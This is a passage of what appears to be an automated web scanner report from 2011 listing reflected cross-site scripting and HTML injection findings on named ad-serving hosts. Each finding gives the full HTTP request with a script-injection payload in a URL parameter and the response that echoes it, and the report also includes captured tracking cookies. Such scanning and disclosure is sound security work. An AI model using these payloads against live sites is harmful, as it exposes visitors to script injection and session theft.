udm_0=MLv39CEJZjpv597JwHIRxS7gdG4nwPAq6ZuDH+vX93uE8x+80+EqavgLMjsVMcRzx4ED/5sU/DdHAgOy6ZFF6u9krYB07BFG6K2gCx9zATNAOyKPGfTqVHvkpDwSF+KJXhEbXYpBgIjd3IWX3TqLfPz6jE8vTUf3pdaWUiZB3YUWt0CiIC5F0X3tPgb/SivyvtveJcRXnIKv7kXwRgYvCvr55V+AZTEVXPZ4e3YCovCIOgMpRBSkPQefrNyf8+fevxeSnnxLtLBTd7bn/zQn98TJd0YWeOHbFIVzmnJlL/meZ5F8yEzm7HiS+gYXKCqjfBEgEJXe7pa4nhHi/FyghIrWjtv72jtBRuTmEa1PtCcp9wfqOSXME/TC3DDlgc0Ij565ULgb+NLzIZ6TpI8vIyqOkYR2CJSFdZdVnBUG0ncgAuL4be/4qG/lpeLJAr4R2ZcdSh9ENtyBu0UsstxyoNHHwBT0SxG1olEQxWdxat7mSTK4NzNH7bvJyyZeNxeZoviFwczbub9BMnSayVKnrf8mLmZYn0G+URiIr9to1aqeDG6xKYVAmQwGVEGKynGOyuqpwObt+MyvmywUWEZ1qy3YzLOSZi95dlvgQqf5nm2jI0E/rWzPceCg9nrDXdY5aA2KiG6/Ag/Qtn9BE0P6tHnl8GXHStyZrY4yXNhIUbljw44dlYagYpCHt4M3J4bPZG8YwZUp0ecARePUDtezFyfvRsc1iatb1pDP+cq/6Iul6LmWpIrzCvxlo9THyXVf5SG33tg9Lw2R/Ro5VrxlHAMqi5EG0xBZZuKHWEnXQrAXGw8FaURhjx71p9CkHtHT1BpsJC15G4HDCuuHnAqa2MRPkYaEZL2cVa7b84SiSmL76sma6ZAVTmsWibG6oMtgf+rO6uurjCoZJ5OCsW83NGfMcjZCzPl33xUGXappEWzObGyaUvOz7ose722NuQ6CgmfMlORcS+CfKwXULjWH6Zy36QCvGrnsM/T/4K0FLlEQnA/ZrpS8O/uyK8UlrSZbknpF5SKlqTmNy5yEGuQ4SS+qP+oPyRgWbGkd6TLhbS8wVZYRN53ZAc0jxNNVRDNVFRE9QSI2VrlZ/Ka1RizjzXzy0Mrq6kcHNlCK91uDwhC94dfZh3mu4LEbkhOgwvScvmwGeZy8gGWoQEjk0gAgb9SgQmtGBl5C+T7TrdHq6EejqJkS0OH/st2RxRBZGNqPJSPFO3Z9nkwH7dr0G89yU1lVThr9TPeyrKuuQlOnafjtcNVr+buGb3emJOGcjzfH90v2UdAQiKm9gZ6BDbLaq/nbVWxP/5HqWbZLa2/RS2GM94ibxZPKXwTQTSnoK6758zl7N8nLPQGrb7mauaNrJ0v4zNciOQWnVNzZaqhQO8UVgcjuWrUQiJTPQWDKxu4w8eoM53ZEdNIh7WnKbwDRVqkqD0y1KsGwOeg2fZkSaLcNFed69lS3DYgh37CBN1ozAybkSybs/DUjRL93JTQZlPIkdLkbJkhmGdhN2G2Xb4uomwrwx4xxkHDHG3BOj3sObWJNvojJs1Id/pPS2nPanvOm; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4df0ca7b&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dca0a20&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_8VB0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 13:33:30 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Proc-ms: 2
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 13:33:29 GMT
Content-Length: 6560

//Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC)
var rsi_now= new Date();
var rsi_csid= 'G07610';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...
i>>18))+"%"+_rsiCa(0x80+(i>>12&0x3F))+"%"+_rsiCa(0x80+(i>>6&0x3F))+"%"+_rsiCa(0x80+(i&0x3F));}window[rsi_csid]=new rsiClient(rsi_csid);
if(window[rsi_csid])window[rsi_csid].DM_addEncToLoc("bpid",'S02778f3ae';alert(1)//c43dde16a24');else DM_addEncToLoc("bpid",'S02778f3ae';alert(1)//c43dde16a24');
function asi_addElem(e){var p=document.body==null?document.getElementsByTagName('head')[0]:document.body;p.insertBefore(e,p.firstChil
...[SNIP]...

2.101. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload ad57a<script>alert(1)</script>db723b0c3cf was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=K05540ad57a<script>alert(1)</script>db723b0c3cf HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; 
rsiPus_qbvO="MLsXrrEOpxpv55DW8tahZ2a57v4BlC60cICOgIfdHU7gwI+bhP0TqX40neBrVzd04YF7hotNL+h4vvc66tVVUjceSeakCP8FKl+7vpw/cPKd8tMu3PMCPoyxK8+ZjwDWyB3QMrpomCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3RK+PP1zwMehHWmM2JccWRv5ZmhNfQmN/YDBU94E+biCIoa0pKkv2eA2x+zJ1SCIL380rO+L9Lk2iLRCLsePDloY4CaZKvkWcnHN4spMzHQnUA9nMhOsrooPww0kmF/1pBhtUOQIGwwBNshy3r9jL9DmeVgwo+si4cw2GLg+UiObBCYgDoqFuF17tgWtie8ndkcM4/dxQZHmAVAFp6Cd4+NKEDE1ApHgzdWMCRN3mtXvTF3dagjo97ZcxX3TK0H5gNZL/tX25K+rZRwN8wPyK9oLx40INCM6m5859n+iEwb4c3uHEIWIExaGsanUSO3meucYKt8SqtiIB1ZKfcV2EWnE5l0JI9ym05H0J1D++1YxD2YWIf3FMp0ODLJXHC5LJl8HAXM9kRR0eUwpIWZ43I4Sxu/ghMwCqycSGD5P5qCz+NfB7cpFNnCm/MZxXAtHhkwlvld7DwvFMTxzkmteonO6+tWDCvSgxfKLeBCsnh7/g2pdMlW86tZQUhX+5vIkdTKTAbn/ygJRg0T3sdyAIGgf6VindVNH18jDokISc3IGyw/B24wJC4km6cNzLCqq3zgXP3vffJqf4px62L8VMyvj3CaMObL1w9lE2lhd4iKvN3GccP1FcTweH5kHDsZZBw7FHK1W7K9ytiQtKzGQRCBtx0rurYuoXmj+tBMHYIGgQGQbpACUKiwMwgO11XDJXNsqWXOeTs409iMvRAAhFR3MmxY/Ai8JtqiI6b0Q1+g1WTMqPGi0honF4/t46uL9iK78Kt/amFrG5zPGbmiPmMFkLKl9wLroTlxm+6qkNbYbThc0/QKEKH9b1zlGLxfdlc3hqznACvxpp0ybDR66WjOYSYr5GJsa1Cu2wcBHbKR1AxsYBzoLba+u6l87gczye8xuTrYhFfwlnHydy7IYalgPJBk32vZgWW2CXqypZtqnwMKkA2NoSDvvRLOZsd5s2E5nriVmz0A020hMNet6ezR0BbsbFJkikbhD25+D5hxe38KqYGvD586gb8nEzI0j5isfTJ/lkLrhbQFBZeshLI9NVhvhrxY3ujvMVlKz2TG/zsc7BVzk9fFPtT7mgROfudWRI+VvwrnXNE2vCSQzOJZeEAKPJctLVBCeeH5f0I+bMVOeVLPDBFeBnbAN+UOthqW+XB3wOga/8nLvsjoupDcwH+hneOk/D89Naxn/NKF3MEN04OWc1SJ6wrzqU6VhG4EvS+Zv+fJ8Gt98W7PtFLVLD0oQ=="; rsi_us_1000000="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"; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; udm_0=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; 
rsi_segs_1000000=pUPF4kmhOHMQJvAtY6gq+mkAZPosg7ZjSjmgIGbYEtpU+w6+9L4ioURjDVUZb5s2bJaZJyc3lSTsOodoc+LzjgnPXWfftsdz6As2U+S4m3sZ93GnJHkwYOujESwdtKPV2XiklIXPPxY08/+jghS00wcrqZXadzeLZbfrn9ShlwBQ2xmbpA283BtMERrEkp0Jl7AlGaEi8uw/pmdbkTDTCxPk3RxS+r7mTK51H+dLGRbW1fSty/wzVcn4GiBJEhk/0uP0JFLwQAUiAigtm0ZNVycI9AGE/kbo+Gm2GaMwx2IDZVAxGSGKhVfyxDow7LMEpP+/5AxB2aqXpAeWvKTgzd0wbPD0VLITZHo4oKcp6znXDZ/0QtZDxMyG+eh98ur0yF4RcpWqIFje74P6+IbKGLCNtlrtWjwe4OKLvE7KtEgbkcPkFFEShWCdZOSVCnDDkQcZ7HqnUdiwoMeOl35blI92a8QslLUelxYP8/7ksRF/dL4tgXNSVaB+tc0Q5yCGeoBCNTt3rHulcarLm9u5vCWFGW2APunE21aEXgSBAE52Pz5NcqBzMbUN/aEDea9hT+n/3Y/e5hgqyzCkCuGvIG755LivtanLgcg2kcQ5uwmgC0vJQMjRNKX40aTX4VArAzArEgBdkaBkXfsvkFD+Nbxz+zvek4KSXCepFAowCLMZjznkiJClqCAqKRQUoG7+ayD2Ys4bs0RrCwTlot+9B1Fervh4516lHDTrQVdcQIQ5uu++FItEtxejK+cd66ciMtQpvPlEfyhWIHOWGVBeyuJu+FtYTiNAvtNO6ZKSdLQTUzHI1ezwsB4RXs2oHFesxvqomNGH01i4; rtc_IJp3=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Thu, 12 May 2011 13:28:29 GMT
Cache-Control: max-age=86400, private
Expires: Fri, 13 May 2011 13:28:29 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 13:28:29 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "K05540AD57A<SCRIPT>ALERT(1)</SCRIPT>DB723B0C3CF" was not recognized.
*/

2.102. http://mads.com.com/mac-ad [&&&&&&adfile parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.com.com
Path:   /mac-ad

Issue detail

The value of the &&&&&&adfile request parameter is copied into the HTML document as plain text between tags. The payload 90a7b<a>03a92f842f2 was submitted in the &&&&&&adfile parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?&_RGROUP=13038&&CNET-BRAND-ID=2&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=2&ASSET_HOST=adimg.com.com&&&&&&&ENG:DATETIME=2011.05.12.09.28.27&SYS:RQID=01phx1-ad-e19:4DCB7A2656E16D&&REFER_HOST=tag.admeld.com&&&&&&&adfile=7074/11/445195_wc.ca90a7b<a>03a92f842f2 HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
Referer: http://mads.com.com/mac-ad?CELT=ifc&BRAND=2&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=13038
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:41 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Thu, 12 May 2011 13:33:41 GMT
Content-Length: 594

<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="&_RGROUP=13038&&CNET-BRAND-ID=2&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=2&ASSET_HOST=adimg.com.com&&&&&&&ENG:DATETIME=2011.05.12.09.28.27&SYS:RQID=01phx1-ad-e19:4DCB7A2656E16D&&REFER_HOST=tag.admeld.com&&&&&&&adfile=7074/11/445195_wc.ca90a7b<a>03a92f842f2" _REQ_NUM="0" -->
...[SNIP]...

2.103. http://mads.com.com/mac-ad [BRAND parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.com.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7654a"><script>alert(1)</script>e0762987b06 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?CELT=ifc&BRAND=27654a"><script>alert(1)</script>e0762987b06&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=13038 HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:22 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 12 May 2011 13:29:22 GMT
Content-Length: 2486

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<a href="http://adlog.com.com/adlog/c/r=13038&amp;sg=445195&amp;o=&amp;h=cn&amp;p=2&amp;b=27654a"><script>alert(1)</script>e0762987b06&amp;l=en_US&amp;site=2&amp;pt=&amp;nd=&amp;pid=&amp;cid=&amp;pp=&amp;e=&amp;rqid=01phx1-ad-e16:4DCB4EC77D9544&amp;orh=admeld.com&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=tag.admeld.com&amp;
...[SNIP]...

2.104. http://mads.com.com/mac-ad [BRAND parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.com.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d12c"><script>alert(1)</script>c5876294348 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?CELT=ifc&BRAND=1d12c"><script>alert(1)</script>c5876294348&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=13038 HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:26 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 12 May 2011 13:29:26 GMT
Content-Length: 2483

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<iframe src="http://mads.com.com/mac-ad?&amp;_RGROUP=13038&amp;&amp;CNET-BRAND-ID=1d12c"><script>alert(1)</script>c5876294348&amp;HUB=cn&amp;PTNR=2&amp;LOCALE=en_US&amp;CNET-SITE-ID=2&amp;ASSET_HOST=adimg.com.com&amp;&amp;&amp;&amp;&amp;&amp;&amp;ENG:DATETIME=2011.05.12.09.29.26&amp;SYS:RQID=01phx1-ad-e20:4DCB7FE15237E7&amp;
...[SNIP]...

2.105. http://mads.com.com/mac-ad [CELT parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.com.com
Path:   /mac-ad

Issue detail

The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload a300e<a>fc79e3bca16 was submitted in the CELT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?CELT=ifca300e<a>fc79e3bca16&BRAND=2&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=13038 HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:52 GMT
Server: Apache/2.2
Content-Length: 388
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: text/plain
Expires: Thu, 12 May 2011 13:28:52 GMT

<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="CELT=ifca300e<a>fc79e3bca16&BRAND=2&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=13038" _REQ_NUM="0" --><!-- MAC-AD STATUS: ; MAPPING UNEXPECTED CELT &quot;ifca300e
...[SNIP]...

2.106. http://mads.com.com/mac-ad [SITE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.com.com
Path:   /mac-ad

Issue detail

The value of the SITE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd19e"><script>alert(1)</script>db9b41f1aae was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?CELT=ifc&BRAND=2&SITE=2fd19e"><script>alert(1)</script>db9b41f1aae&ADSTYLE=NOOVERGIF&_RGROUP=13038 HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:34 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 12 May 2011 13:29:34 GMT
Content-Length: 2065

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<img src="http://adlog.com.com/adlog/i/r=13038&amp;sg=513958&amp;o=&amp;h=cn&amp;p=2&amp;b=2&amp;l=en_US&amp;site=2fd19e"><script>alert(1)</script>db9b41f1aae&amp;pt=&amp;nd=&amp;pid=&amp;cid=&amp;pp=&amp;e=&amp;rqid=00phx1-ad-e16:4DCBD1AEFF9C8&amp;orh=admeld.com&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=tag.admeld.com&amp;cpnmodule=&amp;
...[SNIP]...

2.107. http://mads.com.com/mac-ad [SITE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.com.com
Path:   /mac-ad

Issue detail

The value of the SITE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19a61"><script>alert(1)</script>325ea0f4ed7 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?CELT=ifc&BRAND=2&SITE=19a61"><script>alert(1)</script>325ea0f4ed7&ADSTYLE=NOOVERGIF&_RGROUP=13038 HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:45 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 12 May 2011 13:29:45 GMT
Content-Length: 2488

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<iframe src="http://mads.com.com/mac-ad?&amp;_RGROUP=13038&amp;&amp;CNET-BRAND-ID=2&amp;HUB=cn&amp;PTNR=2&amp;LOCALE=en_US&amp;CNET-SITE-ID=19a61"><script>alert(1)</script>325ea0f4ed7&amp;ASSET_HOST=adimg.com.com&amp;&amp;&amp;&amp;&amp;&amp;&amp;ENG:DATETIME=2011.05.12.09.29.45&amp;SYS:RQID=00phx1-ad-e15:4DCB4CB280090E&amp;&amp;REFER_HOST=tag.admeld.com&amp;&amp;&amp;&amp;&amp;&am
...[SNIP]...

2.108. http://mads.com.com/mac-ad [_RGROUP parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.com.com
Path:   /mac-ad

Issue detail

The value of the _RGROUP request parameter is copied into an HTML comment. The payload 1cf86--><a>0abcf34b1c3 was submitted in the _RGROUP parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /mac-ad?CELT=ifc&BRAND=2&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=130381cf86--><a>0abcf34b1c3 HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:59 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 12 May 2011 13:29:59 GMT
Content-Length: 1323

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<!-- NO AD TEXT: _QUERY_STRING="CELT=ifc&BRAND=2&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=130381cf86--><a>0abcf34b1c3" _REQ_NUM="0" -->
...[SNIP]...

2.109. http://mads.zdnet.com/mac-ad [ADREQ&beacon parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.zdnet.com
Path:   /mac-ad

Issue detail

The value of the beacon request parameter (which the scanner names ADREQ&beacon, because the value-less ADREQ token immediately precedes it in the query string) is copied into the application's response. The payload 8d698<a>ee8bfb9666e was submitted in the parameter. This input was echoed unmodified in the application's response.

